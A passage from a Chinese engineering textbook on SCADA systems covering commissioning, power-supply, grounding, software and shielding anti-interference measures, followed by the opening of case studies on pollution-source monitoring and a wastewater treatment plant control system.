在系统仿真的基础上进行长时间的运行考验(称为考机),并根据实际运行环境的要求,进行特殊运行条件的考验。 离线仿真和调试阶段的流程如图8.9(a)所示。所谓离线仿真和调试是指在实验室而不是在工业现场进行的仿真和调试。离线仿真和调试试验后,还要进行考机运行,考机的目的是在连续不停机的运行中暴露问题和解决问题。 图8.9 离线仿真和调试流程 在仿真调试完成后,设备就要在现场进行安装。系统安装完成后,就可以进行现场离线调试。所谓现场离线调试是指SCADA系统的所有设备安装完成后进行的调试,在这步调试中,最主要的工作是回路测试。即把主要的仪表和控制设备都带电,而一些可能影响到现场装置的执行器或电器的主回路可以不上电,在调试中主要检查所有的I/O信号连接和整个SCADA系统的通信。例如,在现场有一台电机,该电机的监控有3个数字量输入信号和一个数字量输出控制信号。3个数字量输入信号是远程控制允许、运行、故障。假设在现场设置过热继电器的故障,则要检查该信号在下位机、上位机中与现场三者是否一致;在上位机中输出一个控制该电机的信号,检查下位机是否接收到,在现场设备端是否检测到,比如继电器是否动作。 8.5.2 在线调试和运行 现场进行在线调试和运行过程中,设计人员与用户要密切配合,在实际运行前制订一系列调试计划、实施方案、安全措施、分工合作细则等。现场调试与运行过程是从小到大,从易到难,从手动到自动,从简单回路到复杂回路逐步过渡。为了做到有把握,现场安装及在线调试前先要进行硬件检查,经过检查并已安装正确后即可进行系统的投运和参数的整定。投运时应先切入手动,等系统运行接近于给定位时再切入自动,并进行参数的整定。 在线调试和运行就是将系统和生产过程连接在一起,进行现场调试和运行。尽管离线仿真和调试工作非常认真、仔细,现场调试和运行仍可能出现问题,因此必须认真分析加以解决。系统运行正常后,可以再试运行一段时间,即可组织验收。验收是整个项目最终完成的标志,应由甲方主持、乙方参加,双方协同办理,验收完毕后形成验收文件存档。整个过程可用图8.9(b)来说明。 8.6 SCADA系统可靠性设计 8.6.1 供电抗干扰措施 SCADA系统一般由交流电网供电(220V AC,50Hz),而现场的动力设备会随设备的不同有较大差别。电网的干扰,频率的波动将直接影响到系统的可靠性与稳定性。此外,在系统正常运行过程中,计算机的供电不允许中断,否则不但会使计算机丢失数据,而且还会导致严重的生产事故。因此,必须考虑采取电源保护措施,防止电源干扰,并保证不间断地供电。 1.供电系统的一般保护 SCADA系统的供电一般采用图8.10所示的结构。交流稳压器的设置是为了抑制电网电压波动的影响,保证220V AC供电。由于交流电网频率为50Hz,其中混杂了部分高频干扰信号,故采用低通滤波器让50Hz的基波通过,而滤除高频干扰信号。最后由直流稳压电源给计算机供电,可采用开关电源。开关电源用调节脉冲宽度的办法调整直流电压,调整管以开关方式工作,功耗低。这种电源用体积很小的高频变压器代替了一般线性稳压电源中的体积庞大的工频变压器,对电网电压的波动适应性强,抗干扰性能好。 图8.10 SCADA系统供电结构 2.电源异常的保护 由于计算机控制系统的供电不允许中断,所以一般采用不间断电源UPS,其原理如图8.11所示。正常情况下由交流电网供电,同时给电池组充电。如果交流电供电中断,电池组经逆变器输出交流代替外界交流供电,这是一种无触点的不间断的切换。UPS是用电池组作为后备电源。如果外界交流电中断时间长,就需要大容量的蓄电池组。在许多应用中,为了确保供电安全,采用交流发电机第二路交流供电线路。两路供电设计时,两路供电应引自不同的供电系统,保证在某一路供电电源停止时能够切换到另一路供电电源。 图8.11 具有不间断电源的供电结构 8.6.2 接地抗干扰措施 SCADA系统接地的目的有两个:一是抑制干扰,使计算机稳定工作;二是保护计算机、电气设备和操作人员的安全。但不恰当的接地不但不能抑制干扰,反而会造成极其严重的干扰,因此,正确的接地对SCADA系统极为重要。通常接地可分为工作接地和保护接地两大类。保护接地主要是为了避免操作人员因绝缘层的损坏而发生触电危险以及保证设备的安全;工作接地则主要是为了保证控制系统稳定可靠地运行,防止形成环路引起干扰。 1.接地系统分析 由于SCADA系统中的“地”有多种,故接地线主要分为以下几类:模拟地,数字地,安全地,系统地,交流地。一般对上述各类地均采用分别回流法单点接地,如图8.12所示。 回流线往往采用由多层铜导体构成的汇流条而不是一般的地线,这种汇流条的截面呈矩形,各层之间有绝缘层,可以减少自感。在要求较高的系统中,分别采用横向及纵向汇流条,机柜内各层机架间分别设置汇流条,以最大限度地减少公共阻抗的影响。在空间上将数字地汇流条与模拟地汇流条间隔开来,以避免通过汇流条间电容产生耦合。安全地(机壳地)始终是与信号地(数字地、模拟地)分离的。这些地只在最后汇聚一点,并常常通过铜接地板交汇,然后用线径不小于300mm的多股铜软线焊接在接地极上后深埋于地下。关于接地板的要求及工程实现可参考有关设计手册。 在一般的SCADA系统中至少有三条分开的地线(为避免噪声耦合,3种地线应分开),如图8.13所示。一条是低电平电路地线;一条是继电器、电动机等的地线(称为“噪声”地线);一条是设备机壳地线(称为“金属件”地线)。若设备使用交流电源,则电源地线应和金属件地线相连。这三条地线应在一点连接接地。使用这种接地方法可解决SCADA系统的大部分接地问题。 图8.12 分别回流法接地示例 图8.13 实用低频接地方式 2.输入通道的接地技术 1)电路一点地基准 实际的模拟量输入通道可以简化成由信号源、输入馈线和输入放大器3部分组成。这部分接地常见的错误是将信号源与输入放大器分别接地形成双端接地。由于各处接地体几何形状、材料、埋地深度不可能完全相同,土壤的电阻率等因地层结构各异也相差较大,使接地电阻和接地电位可能产生很大差异。这种接地电位的不相等,不仅会有磁场耦合的影响,而且还会引起环流噪声干扰。正确的接地方法是单端接地,即当接地点位于信号源端时,放大器电源不接地;当接地点位于放大器端时,信号源不接地。 2)电缆屏蔽层的接地 当信号电路是一点接地时,低频电缆的屏蔽层也应一点接地。如欲将屏蔽一点接地,则应选择较好的接地点。 3.主机外壳接地 机芯浮空是为了提高计算机的抗干扰能力,将主机外壳作为屏蔽罩接地。而把机内器件架与外壳绝缘,绝缘电阻大于50MΩ,即机内信号地浮空。这种方法安全可靠,抗干扰能力强,但制造工艺复杂,一旦绝缘电阻降低就会引入干扰。 4.多机系统的接地 在计算机网络系统中,多台计算机相互通信,资源共享,如果接地不合理,将使整个网络系统无法正常工作。若几台计算机的距离比较近(如安装在同一机房内),可采用类似图8.14所示的多机一点接地的方法。各机柜用绝缘板垫起来,以防多点接地。对于远距离的计算机网络,多台计算机之间的数据通信,通过隔离的办法把地分开。 图8.14 多机系统的接地 8.6.3 软件抗干扰措施 除了整个系统的结构和每个具体的控制系统都需要仔细设计硬件抗干扰措施之外,还需要注重软件抗干扰措施的应用。有时一个偶然的人为或非人为干扰,例如并不很强烈的雷击,就使得硬件抗干扰措施无能为力,这在某些重要的工业环节上将造成巨大的事故。使用软件抗干扰措施就可以在一定程度上避免和减轻这些意外事故的后果。 软件抗干扰技术就是利用软件运行过程中对自己进行自监视,和控制网络中各机器间的互监视,来监督和判断控制器是否出错或失效的一个方法。这是SCADA系统抗干扰的最后一道屏障。 1.输入/输出数字量的软件抗干扰技术 1)输入数字量的软件抗干扰技术 干扰信号多呈毛刺状,作用时间短,利用这一特点,对于输入的数字信号,可以通过重复采集的方法,将随机干扰引起的虚假输入状态信号滤除掉。若多次数据采集后,信号总是变化不定,则停止数据采集并报警;或者在一定采集时间内计算出现高电平、低电平的次数,将出现次数高的电平作为实际采集数据。对每次采集的最高次数限额或连续采样次数可按照实际情况适当调整。 2)输出数字量的软件抗干扰技术 当系统受到干扰后,往往使可编程器件的输出端口状态发生变化,因此可以通过反复对这些端口定期重写控制字、输出状态字,来维持既定的输出端口状态。只要可能,其重复周期尽可能短,外部设备收到一个被干扰的错误信息后,还来不及做出有效的反应,一个正确的输出信息又来到了,就可及时防止错误动作的发生。对于重要的输出设备,最好建立反馈检测通道,CPU通过检测输出信号来确定输出结果的正确性,如果检测到错误,便及时修正。 2.指令冗余技术 微机的指令系统中,指令由操作码和操作数组成, 操作码指明CPU要完成什么样的操作,而操作数是操作码的对象。CPU的取值过程是先取操作码,后取操作数。如何判断是操作码还是操作数就是通过取指令的顺序。而取指令的顺序完全由指令计数器来控制,因此,一旦指令计数器受干扰出现错误,程序便会脱离正常运行轨道,而出现“飞车”现象,即操作数数值改变以及将操作数当作操作码的错误。因单字节指令中仅含有操作码,其中隐含有操作数,所以当程序跑飞到单字节指令时,便自动纳入轨道。但当跑飞到某一双字节指令时,有可能落在操作数上,从而继续出错。当程序跑飞到三字节指令时,因其有两个操作数,继续出错的机会就更大。 为了使跑飞的程序在程序区内迅速纳入正轨,应该多用单字节指令,并在关键地方人为地插入一些单字节指令,如NOP,或将有效单字节指令重复书写,称之为指令冗余。指令冗余显然会降低系统的效率,但随着科技的进步,指令的执行时间越来越短,所以一般可以不必考虑其对系统的影响,因此该方法得到了广泛的应用。具体编程时,可从以下两方面考虑进行指令冗余: (1)在一些对程序流向起决定作用的指令和某些对工作状态起重要作用的指令之前插入两条NOP指令,以保证跑飞的程序能迅速纳入正常轨道。 (2)在一些对程序流向起决定作用的指令和某些对工作状态起重要作用的指令的后面重复书写这些指令,以确保这些指令的正确执行。 3.软件陷阱技术 当跑飞程序进入非程序区(如EPROM未使用的空间)或表格区时,采用指令冗余技术使程序回归正常轨道的条件便不能满足,此时就不能再采用指令冗余技术,但可以利用软件陷阱技术拦截跑飞程序。 软件陷阱技术就是一条软件引导指令,强行将捕获的程序引向一个指定的地址,在那里有一段专门对程序出错进行处理的程序。 软件抗干扰的内容还有很多,例如,检测量的数字滤波、坏值剔出,人工控制指令的合法性和输入设定值的合法性判别,等等,这些都是一个完善的SCADA系统必不可少的。 8.6.4 空间抗干扰措施 空间感应包括静电场、高频电磁场以及磁场引起的干扰,对于这类干扰主要采用隔离、良好的屏蔽和正确的接地方法等加以解决。屏蔽主要用来解决电磁干扰,它将电力线或磁力线的影响限定在某个范围之内或阻止它们进入某个范围。其目的是隔断场的耦合,抑制场的干扰。按抗干扰性能,屏蔽可分为静电屏蔽,电磁屏蔽和磁屏蔽。 电场屏蔽主要解决由于分布电容耦合引入的电场干扰问题,因此屏蔽体应对于干扰呈低阻抗,屏蔽层应放在干扰源和敏感电路之间,而且必须将屏蔽体接地。屏蔽体一般用良导体如铜和铝构成,还要注意屏蔽的连续性。 电磁屏蔽主要克服高频电磁场干扰,它利用良导体在电磁场内产生涡流效应来削弱电磁场的干扰。若将屏蔽接地,则可同时起到电场屏蔽作用。 磁屏蔽主要用来防止低频磁通的干扰,它是利用高导磁率材料,如坡莫合金,铁氧体等将敏感电路包围,使干扰磁场短路。空间感应的抗干扰措施可以有以下几种: (1)空间隔离。使敏感设备或信号线远离干扰源(如大型动力设备及大变压器等)。 (2)屏蔽。对敏感电路加屏蔽盒或对信号加屏蔽层,注意屏蔽层不能随意接地,必要时屏蔽层外还要有绝缘层。 (3)交流输出和直流输出的电缆应分开敷设,输出信号应远离动力电缆、高压电缆和动力设备。应加大动力电缆与信号电缆之间的距离,尽可能不采取平行布线,以减小电磁干扰的影响。信号电缆与动力电缆之间的距离等安装要求应符合电气安装规范。 (4)对交流噪声,可在负荷线圈两端并联RC吸收电路;对直流噪声,可在负荷线圈两端并联二极管。 (5)模拟信号线与数字信号线不要走同一根电缆;信号线与电源线要分开,并尽量避免平行敷设。 (6)注意屏蔽的连续性。即不要使屏蔽体中间断开或使屏蔽体与被屏蔽体过早分离。 (7)采用双绞线或同轴电缆,可以大大减小电磁干扰。有条件的地方,还可以采用性能更优越的光导纤维。 (8)输入和输出信号电线、电缆与高压或大电流动力电线、电缆的敷设,应采取分别穿管配线敷设,或采用电缆沟配线敷设方式。 第9章 SCADA系统应用案例分析 SCADA系统的开发与应用,对于提高工业或其他生产过程的控制和管理水平,实现综合自动化都起重要作用。虽然不同行业有其自身特点,但它们对SCADA系统的总体功能要求是有许多共同之处的,SCADA系统的结构也是基本相似的;但也因为不同行业有不同的应用特点,因此,除了有许多可以满足多数SCADA系统要求的产品外,还有很多面向具体行业应用的解决方案。从SCADA系统开发看,虽然包含的内容基本相同,但由于所选用的设备不同,监控要求和重点不一样,涉及的系统开发工具也有不同。由于SCADA系统应用的多样性,解决方案也会有所不同。本章选择了几个比较典型的SCADA系统开发和应用案例,帮助读者更好地掌握SCADA系统开发和应用相关的技术内容、软件工具的使用等。 本章介绍的几个案例都具有一定的典型性。9.1节介绍了污染源在线监控SCADA系统的设计与实现,在国家强调节能减排和环境保护日益重要的今天,开展这项工作具有重要的意义。该系统采用组态王系列产品开发上位机人机界面和管理系统,采用智能仪表进行环境参数的在线检测。考虑到污染源监测点分布广泛的特点,采用了GPRS/CDMA无线网络实现上、下位机的通信。9.2节介绍了污水处理厂SCADA系统的设计与开发。该系统采用了PLC作为下位机,在众多的SCADA系统中,更具有普遍性。下位机系统设计基于CC-LINK现场总线,采用三菱电机Q系列中型PLC和FX2N系列小型PLC做下位机,进行现场参数采集和控制;上位机采用西门子WinCC5.1开发人机界面和管理系统,上、下位机的通信包括有线和无线方式,其中无线方式采用数传电台,实现远程泵站与监控中心SCADA服务器的通信。对系统开发特别是下位机的开发做了详细介绍,包括系统功能设计、各个PLC控制站的I/O配置、基于OPC的上、下位机通信组态与配置、PLC控制软件开发中采用的一些新的技术和手段等。9.3节介绍了油田抽油机的SCADA系统设计与开发,该案例体现了非常强烈的行业特征,特别是下位机系统,采用了专门设计的RTU产品—采油机控制器和采油机计量控制器。这两种下位机的编程都采用支持IEC 61131-3标准的编程软件OpenPCS。该系统中,现场RTU单元与监控中心采用数传电台通信。由于每个采油机与监控计算机的通信数据量并不大,因此,数传电台的使用是满足系统对通信实时性要求的。9.4节介绍了某炼油厂原油输送管线SCADA系统设计与开发。该系统输油管线总长255千米,在整个管线上设置了7个现场就地控制站和泵站控制,1个调度中心,1个管理中心。在7个现场控制中心配置了OPTO 22公司的SNAP PAC控制器和SNAP I/O,操作站软件和调度中心、管理中心都配置了OPTO 22公司的人机界面产品。利用OPC技术实现上、下位机的数据交换。在调度中心和管理中心可以实现对整个输油管线的有效管理和监控。 9.1 污染源在线监控SCADA系统设计与实现 9.1.1 概述 随着经济社会的发展,人们在物质文化生活水平提高的同时,越来越关注自身的居住环境问题。中国是一个能源消耗大国,而能源结构中煤炭所占的比重极高,这对我国的大气环境的保护是十分不利的。另外,我国的水污染状况也十分严重,加强水环境的保护也十分重要,国家现在加大了环境保护力度,其中的一项重要措施就是加强污染源的在线监控,加强惩治力度。 污染源在线自动监控系统能够将各个污染源现场的数据汇总到各级环保部门,通过此系统,环保部门一方面可以对各个污染源的污染情况进行实时监控,以便及时甚至提前发现环境问题,并迅速做出反应;另一方面,还可以通过对历史数据的分析,来加强对污染源的排放管理和预测,提高监管水平。这项工作也是排污收费的基础性工作。目前,我国已经建设了一些环境监控系统,然而,这些系统还存在不少问题,主要表现在以下几方面: (1)环保局中心站与各个污染源现场之间没有统一的数据互联互通机制,使得增加对新污染源的监控难以实施; (2)已有系统结构呈现多样性,缺乏较强的兼容性和可扩展性; (3)现有系统在环保局中心站大多采用关系型数据库对数据进行存储,难以满足对大量数据源成千上万个数据点的并发存储、计算和查询等要求; (4)软件安装、配置复杂,维护和使用成本高。 本节介绍了采用北京亚控科技公司组态王和工业数据库等产品构建的污染源在线自动监控SCADA系统整体软解决方案,并对各个子系统进行了介绍。 9.1.2 系统结构与特点 1.系统总体结构 污染源在线自动监控SCADA系统从底层逐渐向上可分为污染源现场监测站、传输网络和环保局中心站3个层次。环保局中心站通过传输网络与现场监测站交换数据,系统总体结构如图9.1所示。 采用本方案,可以较好地解决以下问题: (1)基于我国《污染源在线自动监控(监测)系统数据传输标准》,实现现场监测站与环保局中心站的数据传输标准化。 (2)环保局中心站具有动态增加现场监测站的能力。 (3)现场监测站的历史数据存储与上传能力强;环保局中心站的历史数据召唤与解析、插入存储能力较强。此外,在中心站和现场站通信中断后,该方案可以有效解决中心站的数据完整性问题。 (4)满足环保局中心站对数据存储的时间长度、精度、多点并发及数据压缩能力等方面的功能要求。 (5)环保局中心站采用B/S体系结构,降低客户端软件安装配置的复杂度。 2.系统特点 污染源在线监控SCADA系统特点有: · 提供了一种跨区域乃至全国范围内的对区域环境监测进行集中监控、分析及诊断的解决方案。 · 符合国家《污染源在线自动监控(监测)系统数据传输标准》,实现现场监测站与环保局中心站的数据传输标准。 · 实时监测远程环境状况,有效实现在线预警,显著减小因监管不及时而导致的污染事件造成的社会效益和经济效益的损失。 · 实时的远程诊断及远程指令功能,协助监管部门从容应对重大环境事件、解决跨区域的污染纠纷,实现监管工作的有效性和权威性。 · 支持对远程环境监测点长达数年历史数据的分析决策,基于工业库的历史数据,环保监管部门可以建立数学模型,进行环境监测分析与系统报表,提高决策的准确度及决策效率。 · 基于Internet网络的B/S体系结构部署,使得方案更易于实施。 · 支持断点续传和数据缓存,保持数据的完整性。 · 支持现场监测站的在线增加。 9.1.3 系统配置及功能 1.环保局中心站 环保局中心站由通信服务器、工业数据库、关系数据库、Web服务器和实现各种查询、分析功能的客户端软件构成。该中心站是整个污染源在线监控SCADA系统的监管中心,负责管理和维护所有现场监测站点的实时和历史数据及对数据的管理、分析和查询等。 1)通信服务器 通信服务器上配置亚控公司的I/O Server软件。此软件实现了《污染源在线自动监控(监测)系统数据传输标准》,根据该标准要求,采集各个污染源现场监测站的实时和历史数据,对数据进行分析处理后,分别存储到工业数据库和关系数据库中,供各种客户端软件使用。 正常通信时,软件获得现场监测站的实时数据和报警事件,将实时数据存储到工业数据库中,将报警事件存储到关系数据库中。当现场监测站与环保局中心站通信中断一段时间并恢复通信后,I/O Server一方面恢复采集现场的实时数据和报警事件,另一方面召唤中断时间内存储在现场监测站中的历史数据和报警记录,对历史数据和报警记录进行解析后,分别插入到工业数据库和关系数据库中,以保证环保局中心站数据的完整性。 I/O Server软件支持冗余互备功能。从图9.1中可以看出,通信服务器是环保局中心站与现场监测站数据交互的枢纽,因此容易成为整个系统的性能瓶颈。对于污染源现场众多的环保局,为了降低负荷,保障数据安全性和实时性,可以冗余配置通信服务器。 当现场监测站点增加后,可以很容易在I/O Server中动态增加对新站点的数据采集功能,满足了污染源在线监测系统动态扩展的要求。 2)数据库 除了污染源监控系统外,环保局一般还有例如人事管理等其他信息系统,此类系统需要管理大量关系型数据,因此环保局大都已经有了SQL Server等关系型数据库系统。同时,污染源监控系统需要管理报警记录、权限管理等关系数据,因此,中心站还需要配置关系数据库。然而,对于污染源监控系统对数据存储的长时间、高精度(ms级)、多点并发及压缩能力等功能要求,关系型数据库却暴露出诸多不足。对于这方面的要求,典型的解决方案是采取工业实时数据库。这里选用亚控科技耗时3年多研制出的工业数据库产品KingHistorian。 KingHistorian提供多达数万点工业数据的实时采集和管理能力,存储的时间精度达到毫秒级,工业数据的检索速度比传统关系型数据库快几倍甚至几十倍。软件还实现了旋转门数据存储算法,大大减少了数据存储的要求和对硬件处理能力的要求。软件还能够对数据点进行动态增减。 KingHistorian提供的计算引擎支持VBScript 与Jscript两种脚本语言,用户利用它们能够方便地对数据库中的变量进行平均值、最大值、最小值、累积值等统计数据,或对环保行业其他数学模型的实时计算,降低了突发计算对硬件的负荷能力要求。数据库中的变量可以作为计算式中的输入,也可以作为结果输出。KingHistorian还提供了COM、OLE DB、标准SQL等外部编程接口,极大增强了软件的开放性和二次开发能力。尤其对于C/C++用户,开放了API接口。 3)客户端软件 此系统采用了流行的B/S体系结构,客户端机器上只要安装了IE浏览器,连接到环保局内部网(Intranet)或者广域网(Internet),就可以实现历史数据查询、历史趋势曲线、实时画面监控、实时趋势曲线、Excel报表生成与打印、报警监控与记录查询等功能。 2.现场监测站 现场监测站位于各个污染源现场监测点,又可分为现场仪表、现场通信网络、数据采集传输服务器3个部分。现场仪表负责污染源监测点的数据采集,比如火电厂的烟气排放量、氮氧化物、硫化物含量等数据。 现场监测站的情况会复杂一些。对于一些现场站,可以采用支持总线的仪表,用总线将这些仪表联网,再与现场的SCADA服务器进行通信,解决数据的采集问题。选用的总线可以是简单的RS-485总线网络,也可以是FF、Hart、Profibus或Lonworks等其他现场总线网络。这种方式的优点是可以对监测现场分布较广的测控点的数据采集,节省电缆成本,方便调试,但系统成本会较高。 对于传统的模拟式仪表,可以采取在现场加装具有各种I/O接口的数据采集装置,该数据采集装置可以通过串口或其他通信接口与现场SCADA服务器进行通信,从而实现污染源的数据采集。这种方式的优点是对仪表的通信功能要求低,且成本较低,但现场布线成本较高,且容易受到干扰的影响。 现场SCADA服务器负责对实时数据进行汇总、分析、存储,并负责与中心站通信服务器的数据交换。同时,现场SCADA服务器还可以实现本地监控,它是监控现场的主要的人机界面和监控中心。现场SCADA服务器是监控中心的数据来源,其功能的实现和运行的状态影响整个系统的操作和管理。为了实现更好的集成,这里可以选用亚控公司的人机界面产品组态王,当然,也可以选择其他的组态软件产品。 3.传输网络 传输网络负责将污染源现场监测站的数据传输到环保局中心站。分为基础传输层和应用层两个层次。依据不同的传输网络,基础传输层可有两类实现方式。 一类是基于TCP/IP 协议的,如通用无线分组业务(General Packet Radio Service,GPRS)、非对称数字用户环路(Asymmetrical Digital Subscriber Loop,ADSL)、码分多址(Code Division Multiple Access,CDMA)等。另一类是基于非TCP/IP 协议的,如公共电话交换网(Public Switched Telephone Network,PSTN)、短消息数据通信等。 由于污染源现场一般环境比较恶劣、偏远,不太适合采取有线通信方式,因此,可以采用GPRS、CDMA等无线网络来实现数据通信。组态王支持国际和国内主流厂家的GPRS设备,因而容易解决通信接口问题。 为了保证系统的兼容性,规范上位机和现场监测站的通信规范,国家环保局于2005年12月30日发布了《污染源在线自动监控(监测)系统数据传输标准》(HJ/T212-2005)。并于2006年2月1日正式实施。此标准规定了传输网络的应用层协议,一方面保证了系统的兼容性,另一方面,体现了协议的通信介质无关性,为不同环境下选择不同的通信方式提供了灵活性。 9.2 污水处理厂SCADA系统设计与开发 9.2.1 概述 1.工艺介绍 某县级城市污水处理厂远期设计能力为10万吨/日,并采用分期建设,近期规划建造2×2.5万吨/日污水处理厂。该污水处理厂采用一体式三槽氧化沟工艺,其工艺流程如图9.2所示。污水泵站收集的污水通过管道输送到污水处理厂,经过预处理去除污水中的漂浮物和沙石,并经过污水泵房潜污泵提升到一体式配水井,经配水井按照工艺要求分别进入氧化沟的两个边沟,氧化沟对污水进行生化处理,氧化沟出水经过加氯后外排。氧化沟中污泥经过排泥泵抽出,经过浓缩池、均质池后再用污泥脱水机脱水,再将泥饼运送到污泥堆场。污泥处理过程中的污水经过管道送入氧化沟再处理。 图9.2 污水处理厂工艺流程 一体式氧化沟集曝气、沉淀、泥水分离和污泥回流功能于一体,曝气净化与固液分离操作同在一个构筑物内完成,污泥自动回流,连续运行,设备和池容利用率为百分之百。该工艺的主要特点是:工艺流程短,占地少,投资省,管理简便,处理效果稳定可靠,除能有效除去COD 、BOD和SS外,硝化和脱氮作用也很明显,剩余污泥量少,固液分离效率高。正因为如此,一体化氧化沟在我国中小城市污水处理厂中得到广泛的应用。 计算机监控系统对污水处理厂区的设备,如进水泵、粗格栅、细格栅、鼓风机、转刷、堰门、污泥泵(电动闸门)、浓缩机、搅拌器和压滤机等全厂电器设备的电气参数、工艺参数、运行工况等进行监视、操作、控制和管理。 污水处理厂监控系统的设计目标就是要保证整个污水处理过程的安全、平稳和节能进行,确保出水水质达标排放,最大程度提高运行效率,降低工人劳动强度,降低运行成本。此外,计算机监控系统对保护设备和人员安全,延长设备寿命也起重要作用。 2.设计思想与内容 采用现场总线、分布式控制等先进技术设计了污水处理厂计算机监控系统。系统采用分层结构,以实现分散控制、集中管理。开放的现场总线协议可将各厂家的产品融合于一个系统,实现综合自动化的各种功能,并可以方便地实现现场仪表的在线诊断与远程维护,提高自动化系统的安全可靠性,同时节省电缆,减少了设计和安装工作量。因此,基于现场总线技术设计污水处理厂SCADA系统也是水到渠成的事情。 本案例详细介绍了某城市污水处理厂SCADA系统设计。首先介绍了该厂的工艺,然后针对该厂工艺特点、设备布置、监控和管理等要求设计了SCADA系统。详细介绍了系统结构、功能、控制方式等,并讨论了仪表、PLC、监控计算机、通信网络等选型,特别是详细介绍了各PLC站的设计和设备选型、下位机PLC控制软件设计与开发及上位机人机界面设计与开发。该系统具有结构合理、功能强大、开放性好的特点。该系统可以和上级单位的管理计算机通信,成为城市水和污水监管系统的子系统,接受更高层次的管理和调度。还可以和城市污染源远程监控系统联网。该系统的设计与开发为该城市污水处理达标排放,提升城市环境水平具有重要意义。 本设计没有盲目追求最先进技术和设备应用,而是本着实事求是、技术先进与可靠并重的原则。可以在现有软、硬件基础了进行先进控制、管理等功能的进一步开发,为实现污水处理成本等综合生产指标的优化打下了基础。 9.2.2 污水处理厂SCADA系统结构与功能 1.系统总体结构 针对某污水处理工艺流程的特点,结合各流程的建筑总图分布情况和生产管理的合理性,并考虑到远期建设的需要,采用如图9.3所示的分散控制集中管理的集散控制系统结构。系统分3级,即处于系统最上层的中央控制站、处于系统中间层的现场操作站和PLC控制站以及现场PLC从站和实现上、下位机通信的通信网络。在上位管理级还配置化验室操作站,用于化验员输入各种分析数据,为SCADA系统优化运行提供必要的信息;配置了企业领导操作站,便于领导了解污水处理厂运行情况,为科学决策提供依据;还配置了管理计算机,方便企业的信息化管理,提升企业管理水平。企业管理计算机主要从现场SCADA服务器中提取一些历史数据,形成各种报表等,并对企业运行、维护和管理等数据进行综合核算。 SCADA系统采用了两级网络结构,管理级采用了环形光纤以太网,设备层采用三菱电机CC-LINK现场总线。远程污水泵站PLC控制站与监控中心SCADA服务器之间采用基于数传电台的无线RS-232串行通信。以太网是企业骨干通信网络,也是信息化的重要基础设施。由于操作站和中央控制室距离较远,室外干扰较多,为了增加网络性能,并考虑到远期建设对全厂信息交换的容量要求,因而采用环形光纤网络以增加网络通信容量、速度与可靠性。 图9.3 污水处理厂计算机监控系统结构图 中央控制站由中控计算机、打印机和全厂监控软件等组成,中央计算机配置了19英寸大屏幕LCD显示器。中央控制站完成各个工艺流程中的各电气设备、工艺参数、运行参数的监控功能;同时完成系统对这些信号和参数的报警记录和报表生成的管理功能,并对过程的各种信息进行存储。中控室操作和管理人员通过上位机不仅能够及时了解全厂工艺、泵站等不同地域设备、电气设备运转情况,进水流量、出水COD等重要工艺参数,而且能够及时对全厂生产情况进行调度,以实现生产过程的优化运行。 现场操作室配置了现场SCADA服务器、现场操作站和操作站监控软等。现场SCADA服务器主要采集远程泵站的数据、2个2.5万吨/日污水处理厂CC-LINK总线PLC控制系统的数据,并对这些信息进行存储。操作站计算机配置了19英寸大屏幕LCD显示器。现场操作站提供操作人员HMI人机接口,它不和PLC控制系统通信,其数据来源于SCADA服务器。通过现场操作站,操作人员可以实现对各自管理的工艺流程中的设备、工艺参数、运行参数的监控,还具有对这些信号和参数的报警记录和报表生成等管理功能。此外,现场操纵站还可以实现全厂污水处理设备的协调工作,实现污水水处理过程的平稳运行。 监控系统的直接控制功能的实现通过CC-LINK总线连接的各个PLC主站和从站完成,这些监控设备完成对污水采集、分配、处理、排放和污泥处理等工艺过程的直接控制。CC-LINK总线的PLC主站与现场操作站都位于现场操纵员室。在该CC-LINK现场总线网络上有一个主站,QJ61BT11作为接口模块。该总线系统从站有两大类:一类是远程I/O站;另一类是本地站PLC站。由于业主对于设备的招标是分开进行的,氧化沟设备提供商主要提供转刷和堰门及其相关的电气控制柜,这些电气柜集中放置在配电间。而搅拌器和污泥泵则由其他设备商提供,他们为这些设备单独配置了放置于现场的电气箱。因此,转刷和堰门的控制由CC-LINK主站PLC直接进行控制;而为搅拌器和污泥泵的监控配置了3个远程I /O站。此外,为泵房等预处理系统和污泥处理系统分别配置了带CPU的CC-LINK本地PLC站。这样整个PLC监控系统按照不同的功能分成了多个站点,不同的控制站具有一定的独立性,系统结构合理。 2×2.5万吨/日规模污水处理厂的控制系统主要包括污水预处理、污泥处理和2个2.5万吨/日规模的氧化沟的控制。而两个氧化沟设备配置和工艺完全一样,所以本节在介绍氧化沟系统硬件配置和程序开发时是针对1个2.5万吨/日规模氧化沟。由于该厂未来还要进一步增加污水处理能力,因此在系统设计上还是考虑到了远期建设,在系统扩展性和软、硬件冗余等方面满足未来扩建要求。当未来新增加污水处理能力时,只需新增加同样类型的CC-LINK总线PLC控制系统;对于远程泵站,可以增加相应的监控采集设备和无线数传电台。 2.系统功能描述 SCADA系统主要作用是完成对污水处理整个工艺流程所必需的数据采集、顺序控制、时间控制、回路调节及上位监控以及联锁保护等,具体内容如下。 1)数据采集和处理 污水处理厂SCADA系统要采集的数据包括数字量和模拟量信号,包括设备运行状态、工艺过程参数、控制设备运行状态与通信网络状态等。 2)时间控制 污水处理厂有些参数检测困难,因此,对相应的设备按照时间进行控制,如污泥泵可以根据工艺周期进行时间控制;格栅就可以按照一定的时间周期进行开关控制。 3)顺序控制 由于污水处理流程中不少设备的控制有一定的顺序,比如,进水泵和除沙机的控制就可以采用顺序控制。为了实现顺序控制,一定要掌握设备的动作顺序和条件。 4)先进控制 采用先进控制可以明显提高污水处理厂的控制水平,实现优化运行。这些先进控制包括溶解氧浓度模糊控制、出水水质和溶解氧浓度串级控制、难于在线测量变量的软测量等。 5)联锁保护 为了保证设备和人员的安全,联锁保护系统的设计十分重要。 6)上位机监控 上位监控系统侧重于对过程的集中管理。如提供报警管理、参数集中显示、过程参数趋势分析和报表汇总等。 3.系统控制方式 全厂计算机监控系统的控制方式为:集中和现场两种方式;集中控制又分为自动和手动,正常运行采用集中自动方式。所谓集中控制是指所有的设备都选择了远程自动控制,因此,可以由SCADA系统统一进行自动控制或通过鼠标、键盘来手动控制。现场控制为手动,主要用于设备检修和调试。 集中自动控制包括半自动和全自动操作模式,在半自动运行模式下,溶解氧(Dissolved Oxygen,DO)的数值不参与设备控制,设备的运行是半自动选择开关的挡位确定的;在全自动运行模式下,设备的运行要根据工艺周期、DO数值和进水流量等参数确定。在集中自动控制时,在上位机上可以操控任意的设备。 